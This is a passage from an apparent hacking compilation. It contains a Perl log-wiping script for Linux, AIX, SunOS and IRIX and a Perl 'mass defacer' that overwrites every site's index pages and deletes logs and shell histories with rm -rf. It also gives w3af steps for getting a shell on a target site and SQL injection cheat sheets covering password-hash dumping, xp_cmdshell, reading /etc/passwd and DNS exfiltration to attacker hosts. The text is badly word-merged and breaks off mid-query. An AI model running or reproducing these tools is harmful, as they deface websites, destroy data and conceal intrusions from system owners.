    # # # VirangarSecurityTeam# #http://www.Kouros-bl4ckhat.com# #################################### ^; while(1) { print"Enter WhichOS: "; #User Input chomp($os= <STDIN>); #Takesit intomemory if($oseq"help"){ print"[+]EnterYour OS!Choose from'linux','aix','sunos','irix'n"; print"[+]HitenterwithOS,Let the scriptdo itsworkn"; print"[+]Note:YouMUST Be Root!n"; print"[+]ContactInfo[at]Kouros-bl4ckhat[dot] Com"; print"[+]ForBug finds...Have Fun!n"; print"[+] - Kouros"; } if($oseq"linux"){ #If linux typed,dothe followingandstartbrackets foreachmy $logphile(@linux){ unlink($logphile) ||print"[-]Fuckedup:"$logphile":$!n"; } } elsif($oseq"sunos"){ #If sunostyped,dothe followingandstartbrackets foreachmy $logphile(@sunos){ unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } elsif($oseq"aix"){ #If aix typed,dothe followingandstart brackets foreachmy $logphile(@aix) { unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } elsif($oseq"irix"){ #If irix typed,dothe followingandstartbracket foreachmy $logphile(@irix) { unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } else { print"UmmWTF !?n";} #Logs of Irix Systems { #Start Irix Bracket @irix = ("/var/adm/SYSLOG","/var/adm/sulog","/var/adm/utmp","/var/adm/utmpx", "/var/adm/wtmp","/var/adm/wtmpx","/var/adm/lastlog/", "/usr/spool/lp/log","/var/adm/lp/lp-errs","/usr/lib/cron/log", "/var/adm/loginlog","/var/adm/pacct","/var/adm/dtmp", "/var/adm/acct/sum/loginlog","var/adm/X0msgs","/var/adm/crash/vmcore", "/var/adm/crash/unix")#EndArray } #End Irix Bracket #Log sof Aix Systems { #Start Aix Bracket @aix = ("/var/adm/pacct","/var/adm/wtmp","/var/adm/dtmp","/var/adm/qacct", "/var/adm/sulog","/var/adm/ras/errlog","/var/adm/ras/bootlog", "/var/adm/cron/log","/etc/utmp","/etc/security/lastlog", "/etc/security/failedlogin","usr/spool/mqueue/syslog")#EndArray
  • 177.
    } #End AixBracket #Logs of SunOSSystems { #Start SunOSBracket @sunos= ("/var/adm/messages","/var/adm/aculogs","/var/adm/aculog", "/var/adm/sulog","/var/adm/vold.log","/var/adm/wtmp", "/var/adm/wtmpx","/var/adm/utmp","/var/adm/utmpx", "/var/adm/log/asppp.log","/var/log/syslog", "/var/log/POPlog","/var/log/authlog","/var/adm/pacct", "/var/lp/logs/lpsched","/var/lp/logs/requests", "/var/cron/logs","/var/saf/_log","/var/saf/port/log") #EndArray } #End Sunosbracket #Logs of Linux Systems { #Start Linux Bracket @linux = ("/var/log/lastlog","/var/log/telnetd","/var/run/utmp", "/var/log/secure","/root/.ksh_history","/root/.bash_history", "/root/.bash_logut","/var/log/wtmp","/etc/wtmp", "/var/run/utmp","/etc/utmp","/var/log","/var/adm", "/var/apache/log","/var/apache/logs","/usr/local/apache/logs", "/usr/local/apache/logs","/var/log/acct","/var/log/xferlog", "/var/log/messages/","/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog","/var/log/proftpd.access_log", "/var/log/httpd/error_log","/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log","/etc/mail/access", "/var/log/qmail", "/var/log/smtpd","/var/log/samba", "/var/log/samba.log.%m","/var/lock/samba","/root/.Xauthority", "/var/log/poplog","/var/log/news.all","/var/log/spooler", "/var/log/news","/var/log/news/news","/var/log/news/news.all", "/var/log/news/news.crit","/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err","/var/log/news/suck.notice", "/var/spool/tmp","/var/spool/errors","/var/spool/logs","/var/spool/locks", "/usr/local/www/logs/thttpd_log","/var/log/thttpd_log", "/var/log/ncftpd/misclog.txt","/var/log/nctfpd.errs", "/var/log/auth") #Endarray } #End linux bracket } #Ends Loop [/perl] Mass deface I've a perl tomass deface sitesonthe server.executeitasthe same way as above. [perl] # MSRml V 0.1 # # # # MOROCCO.SECURITY.RULZmass defacerandlogeraser# # # # codedbyPRI[ll #
  • 178.
    # # # !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!# ## # 05/07/2005 # # # # usage : perl MSRml.pl <pathto index># # # # example :perl MSRml.pl /tmp/index.html # # # # the_r00t3r@hotmail.com# #!/usr/bin/perl use strict; my $index = $ARGV[0]; if ($ARGV[0]) { if( -e $index ) { system"echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok!!33[01;37m"n"; system"echo -e "033[01;37mDefacing all homepages..."n"; system"find/ -name "index*"-execcp$index {} ;"; system"find/ -name "main*"-execcp$index {} ;"; system"find/ -name "home*"-execcp$index {} ;"; system"find/ -name "default*"-execcp$index {} ;"; system"echo -e "033[01;37m[+] done ! all sitesinthisbox are defaced!"n"; system"echo -e "033[01;37m----------------------------------------------------------"n"; system"echo -e "033[01;37mCleaningup logs..."n"; system"echo -e "33[01;34m---------erasingdefaultlogfiles(toofast =))---------33[01;37m"n"; if( -e "/var/log/lastlog") { system'rm -rf /var/log/lastlog'; system"echo -e "033[01;37m [*]/var/log/lastlog -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log/lastlog - Nosuchfile ordirectory033[01;37m"n"; } if( -e "/var/log/wtmp") { system'rm -rf /var/log/wtmp'; system"echo -e "033[01;37m [*]/var/log/wtmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log/wtmp - Nosuch file ordirectory033[01;37m"n"; } if( -e "/etc/wtmp") {
  • 179.
    system'rm -rf /etc/wtmp'; system"echo-e "033[01;37m [*]/etc/wtmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/etc/wtmp - No such file ordirectory033[01;37m"n"; } if( -e "/var/run/utmp") { system'rm -rf /var/run/utmp'; system"echo -e "033[01;37m [*]/var/run/utmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/run/utmp - No suchfile ordirectory033[01;37m"n"; } if( -e "/etc/utmp") { system'rm -rf /etc/utmp'; system"echo -e "033[01;37m [*]/etc/utmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/etc/utmp - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/log") { system'rm -rf /var/log'; system"echo -e "033[01;37m [*]/var/log-erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log- Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/logs") { system'rm -rf /var/logs'; system"echo -e "033[01;37m [*]/var/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/logs - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/adm") { system'rm -rf /var/adm'; system"echo -e "033[01;37m [*]/var/adm-erasedOk"n"; }
  • 180.
    else { system"echo -e "033[01;31m[*]/var/adm- No such file ordirectory033[01;37m"n"; } if( -e "/var/apache/log") { system'rm -rf /var/apache/log'; system"echo -e "033[01;37m [*]/var/apache/log -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/apache/log - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/apache/logs") { system'rm -rf /var/apache/logs'; system"echo -e "033[01;37m [*]/var/apache/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/apache/logs - Nosuch file ordirectory033[01;37m"n"; } -10- C:UserskislayDesktoprooted.txt25 January2011 20:54 if( -e "/usr/local/apache/log") { system'rm -rf /usr/local/apache/log'; system"echo -e "033[01;37m [*]/usr/local/apache/log -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/usr/local/apache/log - Nosuchfile or directory033[01;37m"n"; } if( -e "/usr/local/apache/logs") { system'rm -rf /usr/local/apache/logs'; system"echo -e "033[01;37m [*]/usr/local/apache/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/usr/local/apache/logs - Nosuchfile or directory033[01;37m"n"; } if( -e "/root/.bash_history") { system'rm -rf /root/.bash_history'; system"echo -e "033[01;37m [*]/root/.bash_history -erasedOk"n";
  • 181.
    } else { system"echo -e "033[01;31m[*]/root/.bash_history- Nosuchfile ordirectory033[01;37m"n"; } if( -e "/root/.ksh_history") { system'rm -rf /root/.ksh_history'; system"echo -e "033[01;37m [*]/root/.ksh_history -erasedOk"n"; } else { system"echo-e "033[01;31m[*]/root/.ksh_history - Nosuchfile ordirectory033[01;37m"n"; } system"echo -e "033[01;37m[+] -----doneall defaultlogandbash_historyfileserased!!"n"; system"echo -e "33[01;34m---------Now Erasingthe restof the machine logfiles(canbe long:S)---------33[01;37m"n"; system'find/ -name *.bash_history -execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.bash_historyfiles -erasedOk!"n"; system'find/ -name *.bash_logout-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.bash_logoutfiles -erasedOk!"n"; system'find/ -name "log*"-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all log* files -erasedOk!"n"; system'find/ -name *.log-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.logfiles -erasedOk!"n"; system"echo -e "33[01;34m-------[+] !done all logfileserased![+]-------33[01;37m"n"; system"echo -e "33[01;34m---------------------------------------------------33[01;37m"n"; system"echo -e "33[01;34m-----------------MSRmlV 0.1----------------------33[01;37m"n"; } else { system"echo -e "033[01;31m[-] Failed!the path to u're index couldnotbe found !033[01;37m"n"; exit; } } else { system"echo -e "033[01;37m!!Morocco.Security.Rulzmassdefacerandlogeraser!!"n"; system"echo -e "033[01;37m!!!!!!!!!!!!!!!!!!codedbyPRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n"; system"echo -e "033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!033[01;37m"n"; system"echo -e "033[01;37musage : perl $0 <path toou're index>"n"; system"echo -e "033[01;37mexample : perl $0 /tmp/index.html"n"; exit; }
  • 182.
    Getting Shell ofa website by W3af Helloeveryone,youall knowaboutMetasploitanduse itto exploitthe targets.Goodgood...butdoyou knowaboutw3af ( WebApplicationAttackandAuditFramework) byRapid7.Yes,Itisalsodevelopedby Rapid7 whichisa famoussecurityfirmanddevelopedMetasploit.Itisnotbiggerthanmetasploit,butit ismore powerful thanthe otherwebtestingtools.OKnow introductionisover.We proceedtothe practical. Requisites : Python andw3af Step 1: Openthe console andtype: target set targetwww.site.com Step 2: Nowtype: plugins Step 3: Nowwe'll lookforavailable pluginstoenable thembytyping: help
  • 183.
    Step 5: Nowwe'llchose the pluginfromcategory"audit".Type: audit"name of plugin" (asmentionedinthe picture) You can chose multiple pluginsinone shotlike:audit<plugin1><plugin2><plugin3>..... Step 6: If yousaw any pluginwithconfigoptionmarkedas"YES"thento configure ittype: audit config<plugin>
  • 184.
    Step 7: Nowtype: back Step8: Chose anothercategory:(if youwant) evasion orbruteforce oranyone Step 9: Nowwe are readywithour values,tostart the scanningtype: start scan
  • 185.
    Step 10: Afterfinishingthescan,we'll have toexploitthe target.Sotype: Exploit Step 11: Againtype: ExploitosCommandingShell Step 12: If everythinggoesright,we'llgetthe shell of the server,type: interact0 (zero)
  • 186.
    Part - 3 SQL Injection Cheat Sheet  Oracle SQL Injection Cheat Sheet  MSSQL Injection Cheat Sheet  MySQL SQL Injection Cheat Sheet  Postgres SQL Injection Cheat Sheet  Ingres SQL Injection Cheat Sheet  DB2 SQL Injection Cheat Sheet  Informix SQL Injection Cheat Sheet  WordPress Hacking Tricks  DNS Zone TransferVulnerability Exploit  WHMCS Hacking with Sumbit Ticketexploit  WHMCS Auto Exploiter  Oracle Padding Attack Using Brup Suite  HTTP NTLM INFORMATION DISCLOSURE
  • 187.
    SQL Injection CheatSheet Oracle SQL InjectionCheat Sheet Some useful syntax reminders for SQL Injection into Oracle databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT bannerFROMv$versionWHERE bannerLIKE‘Oracle%’; SELECT bannerFROMv$versionWHERE bannerLIKE‘TNS%’; SELECT versionFROMv$instance; Comments SELECT 1 FROM dual — comment – NB:SELECT statementsmusthave aFROMclause in Oracle sowe have to use the dummytable name ‘dual’whenwe’re notactuallyselectingfromatable. CurrentUser SELECT userFROMdual List Users SELECT username FROMall_usersORDERBY username; SELECT name FROMsys.user$; — priv List Password Hashes SELECT name,password,astatusFROMsys.user$— priv,<= 10g. astatustellsyou if acct islocked SELECT name,spare4FROMsys.user$— priv,11g
  • 188.
    PasswordCracker checkpwd willcrackthe DES-basedhashesfromOracle 8, 9 and 10. List Privileges SELECT * FROMsession_privs; — currentprivs SELECT * FROMdba_sys_privsWHERE grantee = ‘DBSNMP’; — priv,lista user’s privs SELECT grantee FROMdba_sys_privsWHERE privilege =‘SELECTANY DICTIONARY’; — priv,finduserswithaparticularpriv SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS; List DBA Accounts SELECT DISTINCTgrantee FROMdba_sys_privsWHERE ADMIN_OPTION = ‘YES’; — priv,listDBAs,DBA roles CurrentDatabase SELECT global_name FROMglobal_name; SELECT name FROMv$database; SELECT instance_name FROMv$instance; SELECT SYS.DATABASE_NAMEFROMDUAL; List Databases SELECT DISTINCTownerFROMall_tables; — listschemas(one peruser) – AlsoqueryTNSlistenerforotherdatabases. See tnscmd(services|status). List Columns SELECT column_name FROMall_tab_columnsWHEREtable_name =‘blah’; SELECT column_name FROMall_tab_columnsWHEREtable_name =‘blah’and owner= ‘foo’; List Tables SELECT table_name FROMall_tables; SELECT owner,table_name FROMall_tables; FindTables From ColumnName SELECT owner,table_name FROMall_tab_columnsWHEREcolumn_name LIKE ‘%PASS%’;— NB:table namesare uppercase SelectNthRow SELECT username FROM(SELECT ROWNUMr, username FROMall_usersORDERBY username) WHEREr=9; — gets9th row (rowsnumberedfrom1) SelectNthChar SELECT substr(‘abcd’,3,1) FROM dual; — gets 3rd character, ‘c’ Bitwise AND SELECT bitand(6,2) FROMdual; — returns2 SELECT bitand(6,1) FROMdual; — returns0 ASCIIValue ->Char SELECT chr(65) FROMdual; — returnsA Char -> ASCIIValue SELECT ascii(‘A’)FROMdual; — returns65
  • 189.
    Casting SELECT CAST(1ASchar) FROMdual; SELECT CAST(’1′ASint) FROMdual; String Concatenation SELECT ‘A’||‘B’ FROMdual; — returnsAB If Statement BEGIN IF 1=1 THEN dbms_lock.sleep(3);ELSEdbms_lock.sleep(0);ENDIF;END; — doesn’tplaywell withSELECTstatements Case Statement SELECT CASEWHEN 1=1 THEN 1 ELSE 2 END FROMdual; — returns1 SELECT CASEWHEN 1=2 THEN 1 ELSE 2 END FROMdual; — returns2 AvoidingQuotes SELECT chr(65) ||chr(66) FROMdual; — returnsAB Time Delay BEGIN DBMS_LOCK.SLEEP(5);END; — priv,can’t seemtoembedthisina SELECT SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROMdual; — if reverse looksare slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROMdual; — if forwardlookupsare slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROMdual; — if outboundTCPis filtered/slow – Alsosee HeavyQueries tocreate atime delay Make DNSRequests SELECT UTL_INADDR.get_host_address(‘google.com’) FROMdual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROMdual; Command Execution Javacan be usedto execute commandsif it’sinstalled.ExtProccansometimesbe usedtoo,thoughit normallyfailedforme. Local File Access UTL_FILE can sometimesbe used. Checkthatthe followingisnon-null: SELECT value FROMv$parameter2WHERE name = ‘utl_file_dir’;Javacanbe used to readand write filesif it’sinstalled(itisnotavailable inOracle Express). Hostname,IP Address SELECT UTL_INADDR.get_host_name FROMdual; SELECT host_name FROMv$instance; SELECT UTL_INADDR.get_host_addressFROMdual; — gets IPaddress SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROMdual; — getshostnames Locationof DB files SELECT name FROMV$DATAFILE; Default/System SYSTEM
  • 190.
    Databases SYSAUX Misc Tips Inno particular order, here are some suggestions from pentestmonkey readers. From Christian Mehlmauer: Get all tablenamesin one string selectrtrim(xmlagg(xmlelement(e,table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') fromall_tables – whenusingunionbased SQLI withonlyone row BlindSQLIin orderby clause orderby case when((select1fromuser_tableswhere substr(lower(table_name),1,1) = ‘a’and rownum= 1)=1) thencolumn_name1else column_name2end — youmust know2 columnnameswiththe same datatype
  • 191.
    MSSQLInjectionCheat Sheet Some usefulsyntax reminders for SQL Injection into MSSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT @@version Comments SELECT 1 — comment SELECT /*comment*/1 CurrentUser SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROMmaster..sysprocessesWHEREspid= @@SPID List Users SELECT name FROMmaster..syslogins List Password Hashes SELECT name,passwordFROMmaster..sysxlogins — priv,mssql 2000; SELECT name,master.dbo.fn_varbintohexstr(password) FROMmaster..sysxlogins — priv,mssql 2000. Needto converttohex to returnhashesinMSSQL errormessage / some versionof queryanalyzer. SELECT name,password_hashFROMmaster.sys.sql_logins — priv,mssql 2005; SELECT name + ‘-’+ master.sys.fn_varbintohexstr(password_hash) from
  • 192.
    master.sys.sql_logins — priv,mssql2005 Password Cracker MSSQL 2000 and 2005 Hashesare bothSHA1-based. phrasen|dreschercancrack these. List Privileges – currentprivson a particularobjectin2005, 2008 SELECT permission_nameFROMmaster..fn_my_permissions(null,‘DATABASE’); — currentdatabase SELECT permission_nameFROMmaster..fn_my_permissions(null,‘SERVER’); — currentserver SELECT permission_nameFROMmaster..fn_my_permissions(‘master..syslogins’, ‘OBJECT’);–permissionsona table SELECT permission_nameFROMmaster..fn_my_permissions(‘sa’,‘USER’); –permissions on a user– current privs in 2005, 2008 SELECT is_srvrolemember(‘sysadmin’); SELECT is_srvrolemember(‘dbcreator’); SELECT is_srvrolemember(‘bulkadmin’); SELECT is_srvrolemember(‘diskadmin’); SELECT is_srvrolemember(‘processadmin’); SELECT is_srvrolemember(‘serveradmin’); SELECT is_srvrolemember(‘setupadmin’); SELECT is_srvrolemember(‘securityadmin’); – who has a particular priv? 2005, 2008 SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1; List DBA Accounts SELECT is_srvrolemember(‘sysadmin’); — isyouraccounta sysadmin? returns1for true,0 forfalse,NULL for invalidrole. Alsotry‘bulkadmin’,‘systemadmin’andother valuesfromthe documentation SELECT is_srvrolemember(‘sysadmin’,‘sa’); — issaa sysadmin?return1 for true,0 for false,NULLfor invalidrole/username. SELECT name FROM master..sysloginsWHEREsysadmin= ’1′ — testedon2005
  • 193.
    CurrentDatabase SELECT DB_NAME() ListDatabases SELECT name FROMmaster..sysdatabases; SELECT DB_NAME(N);— forN = 0, 1, 2, … List Columns SELECT name FROMsyscolumnsWHEREid = (SELECT id FROMsysobjectsWHERE name = ‘mytable’);— forthe currentDB only SELECT master..syscolumns.name,TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns,master..sysobjectsWHERE master..syscolumns.id=master..sysobjects.idAND master..sysobjects.name=’sometable’; — listcolumnamesandtypesfor master..sometable List Tables SELECT name FROMmaster..sysobjectsWHERExtype =‘U’; — use xtype = ‘V’for views SELECT name FROMsomeotherdb..sysobjectsWHERExtype = ‘U’; SELECT master..syscolumns.name,TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns,master..sysobjectsWHERE master..syscolumns.id=master..sysobjects.idAND master..sysobjects.name=’sometable’; — listcolumnamesandtypesfor master..sometable FindTablesFrom ColumnName – NB:This example worksonlyforthe currentdatabase. If youwan’tto search anotherdb,you needtospecifythe db name (e.g.replace sysobjectwith mydb..sysobjects). SELECT sysobjects.name astablename,syscolumns.name ascolumnnameFROM sysobjectsJOIN syscolumnsON sysobjects.id=syscolumns.idWHEREsysobjects.xtype = ‘U’ ANDsyscolumns.name LIKE‘%PASSWORD%’ — thisliststable,columnforeach columncontainingthe word‘password’ SelectNthRow SELECT TOP1 name FROM(SELECT TOP 9 name FROMmaster..sysloginsORDERBY name ASC) sq ORDER BY name DESC — gets9th row SelectNthChar SELECT substring(‘abcd’,3,1) — returnsc Bitwise AND SELECT 6 & 2 — returns2 SELECT 6 & 1 — returns0 ASCIIValue -> Char SELECT char(0×41) — returnsA
  • 194.
    Char -> ASCII Value SELECTascii(‘A’)–returns65 Casting SELECT CAST(’1′as int); SELECT CAST(1as char) String Concatenation SELECT ‘A’+ ‘B’ – returnsAB If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns1 Case Statement SELECT CASEWHEN 1=1 THEN 1 ELSE 2 END — returns1 AvoidingQuotes SELECT char(65)+char(66) — returnsAB Time Delay WAITFORDELAY ’0:0:5′ — pause for5 seconds Make DNS Requests declare @hostvarchar(800); select@host= name FROMmaster..syslogins; exec(‘master..xp_getfiledetails”’+ @host+ ‘c$boot.ini”’); — nonpriv,workson 2000declare @host varchar(800); select@host= name + ‘-’+ master.sys.fn_varbintohexstr(password_hash) +‘.2.pentestmonkey.net’from sys.sql_logins;exec(‘xp_fileexist”’+ @host+ ‘c$boot.ini”’); — priv,workson2005– NB: Concatenationisnotallowedincallstothese SPs,hence whywe have touse @host. Messy butnecessary. – AlsocheckouttheDNStunnel feature of sqlninja Command Execution EXEC xp_cmdshell ‘netuser’; — privOnMSSQL2005 you mayneedto reactivate xp_cmdshell firstasit’s disabledbydefault: EXEC sp_configure ‘show advancedoptions’,1; — priv RECONFIGURE; — priv EXEC sp_configure ‘xp_cmdshell’,1; — priv RECONFIGURE; — priv Local File Access CREATE TABLE mydata (line varchar(8000)); BULK INSERTmydataFROM ‘c:boot.ini’; DROP TABLE mydata; Hostname,IP Address SELECT HOST_NAME() Create Users EXEC sp_addlogin ‘user’,‘pass’;— priv
  • 195.
    Drop Users EXECsp_droplogin ‘user’;— priv Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’,‘sysadmin;— priv Locationof DB files EXEC sp_helpdbmaster; –locationof master.mdf EXEC sp_helpdbpubs; –locationof pubs.mdf Default/System Databases northwind model msdb pubs— noton sql server2005 tempdb Misc Tips In no particular order, here are some suggestions from pentestmonkey readers. From Dan Crowley: A way to extract data via SQLi with a MySQL backend From Jeremy Bae: Tip about sp_helpdb – included in table above. From Trip: List DBAs (included in table above now): select name from master..syslogins where sysadmin = ’1′ From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008 – included in table above. Also: To check permissions on multiple database you will have to use the following pattern. USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, ‘DATABASE’) Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax: select permission_name collate database_default FROM fn_my_permissions (NULL, ‘DATABASE’)
  • 196.
    MySQL SQL InjectionCheatSheet Some useful syntax reminders for SQL Injection into MySQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT @@version Comments SELECT 1; #comment SELECT /*comment*/1; CurrentUser SELECT user(); SELECT system_user(); List Users SELECT userFROMmysql.user; — priv List Password Hashes SELECT host,user,passwordFROMmysql.user; — priv PasswordCracker Johnthe Ripperwill crackMySQL passwordhashes. List Privileges SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges; — listuserprivsSELECThost,user,Select_priv, Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv, Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,
  • 197.
    Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_privFROMmysql.user;— priv,listuser privsSELECTgrantee,table_schema,privilege_type FROM information_schema.schema_privileges;— listprivsondatabases(schemas)SELECT table_schema,table_name,column_name,privilege_typeFROM information_schema.column_privileges;— listprivsoncolumns List DBA Accounts SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privilegesWHEREprivilege_type =‘SUPER’;SELECThost, userFROMmysql.userWHERESuper_priv= ‘Y’; # priv CurrentDatabase SELECT database() List Databases SELECT schema_name FROMinformation_schema.schemata; — forMySQL >= v5.0 SELECT distinct(db) FROMmysql.db — priv List Columns SELECT table_schema,table_name,column_name FROM information_schema.columnsWHEREtable_schema!=‘mysql’ANDtable_schema!= ‘information_schema’ List Tables SELECT table_schema,table_nameFROMinformation_schema.tablesWHERE table_schema!=‘mysql’ANDtable_schema!=‘information_schema’ FindTablesFrom ColumnName SELECT table_schema,table_name FROMinformation_schema.columnsWHERE column_name =‘username’; — findtable whichhave acolumncalled‘username’ SelectNthRow SELECT host,userFROMuserORDER BY hostLIMIT 1 OFFSET 0; # rows numbered from0 SELECT host,userFROMuserORDER BY host LIMIT 1 OFFSET 1; # rows numbered from0 SelectNthChar SELECT substr(‘abcd’,3,1);# returnsc Bitwise AND SELECT 6 & 2; # returns2 SELECT 6 & 1; # returns0 ASCIIValue -> Char SELECT char(65); # returnsA Char -> ASCII Value SELECT ascii(‘A’);#returns65
  • 198.
    Casting SELECT cast(’1′ ASunsignedinteger); SELECTcast(’123′ AS char); String Concatenation SELECT CONCAT(‘A’,'B’);#returnsAB SELECT CONCAT(‘A’,'B’,'C’);#returnsABC If Statement SELECT if(1=1,’foo’,'bar’); — returns‘foo’ Case Statement SELECT CASEWHEN (1=1) THEN ‘A’ELSE ‘B’END; # returnsA AvoidingQuotes SELECT 0×414243; # returnsABC Time Delay SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5);# >= 5.0.12 Make DNS Requests Impossible? Command Execution If mysqld(<5.0) isrunningas root ANDyoucompromise aDBA account youcan execute OScommandsbyuploadingasharedobjectfile into/usr/lib(orsimilar). The .sofile shouldcontainaUser DefinedFunction(UDF). raptor_udf.cexplainsexactly howyou go aboutthis. Remembertocompile forthe targetarchitecture whichmay or may not be the same as your attack platform. Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv,canonlyreadworld-readable files. SELECT * FROMmytable INTOdumpfile‘/tmp/somefile’; — priv,write tofilesystem Hostname,IP Address SELECT @@hostname; Create Users CREATE USER test1IDENTIFIEDBY ‘pass1′; — priv Delete Users DROP USER test1; — priv Make User DBA GRANT ALL PRIVILEGESON *.* TO test1@’%'; — priv Locationof DB files SELECT @@datadir; Default/System information_schema(>=mysql 5.0)
  • 199.
    Databases mysql Postgres SQLInjectionCheatSheet Some useful syntax reminders for SQL Injection into PostgreSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT version() Comments SELECT 1; –comment SELECT /*comment*/1; CurrentUser SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROMpg_user; SELECT getpgusername(); List Users SELECT usename FROMpg_user
  • 200.
    List Password Hashes SELECT usename,passwdFROMpg_shadow— priv Password Cracker MDCrack can crack PostgreSQL’sMD5-basedpasswords. List Privileges SELECT usename,usecreatedb,usesuper,usecatupdFROMpg_user List DBA Accounts SELECT usename FROMpg_userWHERE usesuperISTRUE CurrentDatabase SELECT current_database() List Databases SELECT datname FROMpg_database List Columns SELECT relname,A.attnameFROMpg_classC, pg_namespace N,pg_attribute A, pg_type T WHERE (C.relkind=’r') AND(N.oid=C.relnamespace)AND(A.attrelid=C.oid) AND(A.atttypid=T.oid) AND(A.attnum>0) AND(NOTA.attisdropped) AND (N.nspname ILIKE‘public’) List Tables SELECT c.relname FROMpg_catalog.pg_classcLEFT JOIN pg_catalog.pg_namespacen ON n.oid= c.relnamespaceWHEREc.relkindIN (‘r’,”) ANDn.nspname NOTIN (‘pg_catalog’,‘pg_toast’) ANDpg_catalog.pg_table_is_visible(c.oid) FindTablesFrom ColumnName If you wantto listall the table namesthat containa columnLIKE ‘%password%’:SELECTDISTINCTrelname 